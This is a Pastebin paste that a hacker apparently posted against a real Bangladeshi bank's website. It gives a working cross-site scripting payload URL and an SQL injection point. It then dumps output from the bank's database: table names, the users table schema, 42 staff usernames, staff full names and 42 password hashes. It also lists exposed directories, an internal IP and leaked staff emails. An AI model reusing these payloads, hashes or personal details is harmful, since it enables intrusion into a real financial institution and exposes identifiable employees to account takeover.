API tools faq
paste
human_mind_cracker

report2: bangladesh bank

human_mind_cracker
Oct 28th, 2012
317
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.19 KB | None | 0 0
raw download clone embed print report
  1. **********************************************************************************************
  2.  
  3. [*] Target: www.islamibankbd.com
  4.  
  5. [**]Cross-site Scripting:
  6.  
  7. http://www.islamibankbd.com/feedback/feedback_action.php?email&subject&body&country=%22%3E%3Cscript%3Ealert%28%22XSS%20vuln%20found%20by%20me%20human%20mind%20cracker%22%29%3C/script%3E
  8.  
  9. (work on mozilla firefox)
  10.  
  11. [**] SQL injection:
  12.  
  13. http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'
  14.  
  15. [****] Information Leaked from their database:
  16.  
  17. database: MySQL
  18.  
  19. [*]Vuln on: http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'
  20.  
  21.  
  22.  
  23. available databases [2]:
  24. [*] information_schema
  25. [*] islamidb
  26.  
  27. Database: islamidb
  28. [74 tables]
  29. +--------------------------+
  30. | annualreport |
  31. | ar_cat |
  32. | area |
  33. | articles |
  34. | atm |
  35. | atm_area |
  36. | atm_location |
  37. | audit_committee |
  38. | board_of_directors |
  39. | books |
  40. | branchdtls |
  41. | branches |
  42. | chairman_corner |
  43. | charge_commision |
  44. | corporate_info |
  45. | currencyrate |
  46. | currencyrate0 |
  47. | deposit_scheme |
  48. | deposit_scheme_info |
  49. | dept |
  50. | disclosure |
  51. | district |
  52. | download |
  53. | dynamicsections |
  54. | email |
  55. | eventdetails |
  56. | eventdetails_11 |
  57. | eventdetails_111 |
  58. | events |
  59. | executive_committee |
  60. | feb_aof_info |
  61. | feb_crsp_info |
  62. | feb_csc_info |
  63. | feb_nrb_info |
  64. | feb_rema_info |
  65. | feb_repa_info |
  66. | fex_graph |
  67. | interview |
  68. | investment |
  69. | jobcategory |
  70. | jobdetails |
  71. | keypersonal |
  72. | link |
  73. | link_cat |
  74. | management |
  75. | managementdetails |
  76. | manager_info |
  77. | md_corner |
  78. | md_news |
  79. | md_publication |
  80. | news |
  81. | notice |
  82. | orderby |
  83. | orderplacement |
  84. | paidup_capital |
  85. | personnel |
  86. | photo_album |
  87. | price_sensative_headline |
  88. | privilege |
  89. | profit_rate |
  90. | publication |
  91. | qryjobs |
  92. | rds_perform_details |
  93. | rds_perform_heading |
  94. | shariahcouncil |
  95. | shariahdetails |
  96. | sme_info |
  97. | sme_prd_info |
  98. | sme_zone |
  99. | sponsors |
  100. | sysvalues |
  101. | userrights |
  102. | users |
  103. | video |
  104. +--------------------------+
  105.  
  106. Database: islamidb
  107. Table: users
  108. [13 columns]
  109. +-------------+--------------+
  110. | Column | Type |
  111. +-------------+--------------+
  112. | Address | varchar(50) |
  113. | BranchName | varchar(50) |
  114. | Depertment | varchar(50) |
  115. | Designation | varchar(50) |
  116. | Email | varchar(50) |
  117. | FullName | varchar(50) |
  118. | IsActive | tinyint(4) |
  119. | Mobile | varchar(50) |
  120. | Password | varchar(255) |
  121. | Phone | varchar(50) |
  122. | UserID | int(11) |
  123. | UserName | varchar(50) |
  124. | UserType | char(1) |
  125. +-------------+--------------+
  126.  
  127. Database: islamidb
  128. Table: users
  129. [42 entries]
  130. +------------------+
  131. | UserName |
  132. +------------------+
  133. | atmadmin |
  134. | atmimran |
  135. | bcdadmin |
  136. | bcdraquib |
  137. | borhan |
  138. | bpmdadmin |
  139. | bpmdnizam |
  140. | bpmdsaiful |
  141. | bsadmin |
  142. | bsahashan |
  143. | bsfoysal |
  144. | chairmanadmin |
  145. | chairmanuser |
  146. | dsd |
  147. | ecsdadmin |
  148. | ecsdjahangir |
  149. | fadadmin |
  150. | fadshaheduzzaman |
  151. | hrdabrar |
  152. | hrdadmin |
  153. | hrdahsan |
  154. | hrdmaquddus |
  155. | ibwadmin |
  156. | ibwmonir |
  157. | ictdwebadmin |
  158. | khademibw |
  159. | mdsadmin |
  160. | mdsmohtasim |
  161. | mkamal |
  162. | prdadmin |
  163. | prdhumayan |
  164. | rcidadmin |
  165. | rddadmin |
  166. | rddmashiul |
  167. | rddthohid |
  168. | rdsadmin |
  169. | rdsuser |
  170. | shaheduzzaman |
  171. | shareadmin |
  172. | sharerozaer |
  173. | shariahadmin |
  174. | shariahhabib |
  175. +------------------+
  176.  
  177.  
  178. Database: islamidb
  179. Table: users
  180. [42 entries]
  181. +-------------------------------+
  182. | FullName |
  183. +-------------------------------+
  184. | Admin of HRD |
  185. | Ahsan Habib |
  186. | Habibur Rahman |
  187. | Humayan Rashid |
  188. | Imran |
  189. | Ismail |
  190. | Jahangir Hossain |
  191. | Md. Atiqur Rahman khan Khadem |
  192. | Md. Borhan Uddin |
  193. | Md. Mashiul Alam |
  194. | Md. Mostofa Kamal |
  195. | Mohammd Thohidul Islam |
  196. | Muhammad Abdul Quddus |
  197. | Omar Foysal |
  198. | Qazi Mohammed Shamsul Abrar |
  199. | Rozaer Hossain |
  200. | S M Abdur Raquib |
  201. | Saiful Islam |
  202. | Shaheduzzaman |
  203. | Super Admin |
  204. |_______________________________
  205.  
  206.  
  207. Database: islamidb
  208. Table: users
  209. [42 entries]
  210. +----------------------------------+
  211. | Password |
  212. +----------------------------------+
  213. | 01e8565004e20ebaaee5d1e948cc0f03 |
  214. | 04dcef1b1d1ffff2a2c1f6f31e42348a |
  215. | 0d308e5cfbb51143225b884c2d56167e |
  216. | 0ed377bde3c3a6a3b3c9b8f49c81bcac |
  217. | 119cbed0296edd3415f73ca21d695eb4 |
  218. | 13cf6dd79b3e7d7d398f11a567a0a1b5 |
  219. | 178b0c400e3cbc03418ee64e7af71b6e |
  220. | 2651cea9b74c51aacdbcc1396ce5bfb7 |
  221. | 3d3993a6ece38d0c10b155d5facf78e7 |
  222. | 3eeb8d98c5dba5919eaed3f93bc317e6 |
  223. | 3fb85c9f03577600bc8ba6e2e25a44d5 |
  224. | 46f1eeae56bdf1077e1890cf8c8384a3 |
  225. | 48cda072801bb304a08aaa19cae8ece6 |
  226. | 4c1f0b5771136bf504f8d72144fc0972 |
  227. | 5135cebb53ab8a028f9d16d48ca9f5f5 |
  228. | 6013ee7dc437d4b10b211110ebeb5dc4 |
  229. | 639aa761eb8cdaaf132c98460c3a92be |
  230. | 641e4550176313cfcb7004dc6657c54c |
  231. | 731c4cece807f681524eeb3c00c075c8 |
  232. | 738a639acd1502c515d2ba9a980162e8 |
  233. | 7e242f8c51fdb0b1a754bcdec21d0532 |
  234. | 806938e17a140d0a2847c6d4a7e88e8c |
  235. | 8336f298fed5901d2c58c4c3a0be0522 |
  236. | 86d7ffa824672126bd183a8961d95a1e |
  237. | 8e099fb1fd7804e63e29ca180853f1a3 |
  238. | 9e044b89f318c8848d18ad0f8a64d309 |
  239. | 9f6b071e1e1c75a380a99972fd1d6c87 |
  240. | a06ea6415499e6fc813cdb756da9fdb6 |
  241. | b31d1d300bd4d9438a59169c08535682 |
  242. | bd06b23acb9d8f84149500333cc1c7cc |
  243. | bd596577eefdf3a60b314512035d7de8 |
  244. | bed407e0a32fdd46b71722c11991d9c3 |
  245. | cca35a0265721f5ab431821a745056af |
  246. | d6dec0fde9d68bb607d25b84d45059f0 |
  247. | da1f2fbf9b96c7160869c785b8de4bd6 |
  248. | da7c5f47b4c492545aa55ec5887989a1 |
  249. | db502e13cc0ad9b22440223c095bcdaf |
  250. | e2e796c8d2f15e6eeae1498e063996d1 |
  251. | ecdc03a40c52f1a387cb44ddf5740e5d |
  252. | f099cd5a70853ec7de964fdbb7027bb9 |
  253. | f28d90f403abe8c509aca6bd73930e8f |
  254. | f3c94f7cece18ac86ede31265f24a2e7 |
  255. +----------------------------------+
  256.  
  257. [**] Directory Listing Enabled:
  258.  
  259. Directory listings allow attackers to get better understandings about the server and the application structure. In some situations directory listings may reveal resources which are not supposed to be known.
  260.  
  261. [-]solution: Disable directory listings.
  262.  
  263. url: http://www.islamibankbd.com/upload_dir/photo_album/
  264.  
  265. url: http://www.islamibankbd.com/upload_dir/newsimages/
  266.  
  267. url: http://www.islamibankbd.com/feedback/
  268.  
  269. url: http://www.islamibankbd.com/upload_dir/photo_album/thumb/
  270.  
  271. url: http://www.islamibankbd.com/upload_dir/fex_graph/
  272.  
  273. url: http://www.islamibankbd.com/upload_dir/fex_graph/sym00/
  274.  
  275. url: http://www.islamibankbd.com/feedback/images/
  276.  
  277. [**] IP Disclosure:
  278.  
  279. The server or application disclosed internal network information. This information could be used by attackers to make an educated guess about the internal or external network topology. Leaked IP addresses could be used as a stepping-stone to more complex attacks.
  280.  
  281. solution: Ensure that sensitive information such as internal or external IP addresses is safely guarded. Unless there is a good, prevent the disclosure of network information.
  282.  
  283. ip: 192.168.0.69
  284.  
  285. [**] Email leaked:
  286.  
  287. email: [email protected]
  288.  
  289.  
  290. email: [email protected]
  291.  
  292. email: [email protected]
  293.  
  294. email: [email protected]
  295.  
  296. email: [email protected]
  297.  
  298. email: [email protected]
  299.  
  300. email: [email protected]
  301.  
  302. email: [email protected]
  303.  
  304. email: [email protected]
  305.  
  306. email: [email protected]
  307.  
  308. email: [email protected]
  309.  
  310. email: [email protected]
  311.  
  312. email: [email protected]
  313.  
  314. email: [email protected]
  315.  
  316. email: [email protected]
  317.  
  318. email: [email protected]
  319.  
  320. email: [email protected]
  321.  
  322. email: [email protected]
  323.  
  324. email: [email protected]
  325.  
  326. email: [email protected]
  327.  
  328. email: [email protected]
  329.  
  330. email: [email protected]
  331.  
  332. email: [email protected]
  333.  
  334. email: [email protected]
  335.  
  336. email: [email protected]
  337.  
  338. email: [email protected]
  339.  
  340. email: [email protected]
  341.  
  342. email: [email protected]
  343.  
  344. email: [email protected]
  345.  
  346. email: [email protected]
  347.  
  348. email: [email protected]
  349.  
  350. email: [email protected]
  351.  
  352. email: [email protected]
  353.  
  354. email: [email protected]
  355.  
  356. email: [email protected]
  357.  
  358. email: [email protected]
  359.  
  360. email: [email protected]
  361.  
  362. email: [email protected]
  363.  
  364. email: [email protected]
  365.  
  366. email: [email protected]
  367.  
  368. email: [email protected]
  369.  
  370. email: [email protected]
  371.  
  372. email: [email protected]
  373.  
  374. email: [email protected]
  375.  
  376. email: [email protected]
  377.  
  378. email: [email protected]
  379.  
  380. email: [email protected]
  381.  
  382. email: [email protected]
  383.  
  384. email: [email protected]
  385.  
  386. email: [email protected]
  387.  
  388. email: [email protected]
  389.  
  390. email: [email protected]
  391.  
  392. email: [email protected]
  393.  
  394. email: [email protected]
  395.  
  396. email: [email protected]
  397.  
  398. email: [email protected]
  399.  
  400. email: [email protected]
  401.  
  402. email: [email protected]
  403.  
  404. email: [email protected]
  405.  
  406. email: [email protected]
  407.  
  408. email: [email protected]
  409.  
  410. email: [email protected]
  411.  
  412. email: [email protected]
  413.  
  414. email: [email protected]
  415.  
  416. email: [email protected]
  417.  
  418. email: [email protected]
  419.  
  420. email: [email protected]
  421.  
  422. email: [email protected]
  423.  
  424. email: [email protected]
  425.  
  426. email: [email protected]
  427.  
  428. email: [email protected]
  429.  
  430. email: [email protected]
  431.  
  432. email: [email protected]
  433.  
  434. email: [email protected]
  435.  
  436. email: [email protected]
  437.  
  438. email: [email protected]
  439.  
  440. email: [email protected]
  441.  
  442.  
  443. [****] Picture:
  444. http://www.imagup.com/data/1166122796.html
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!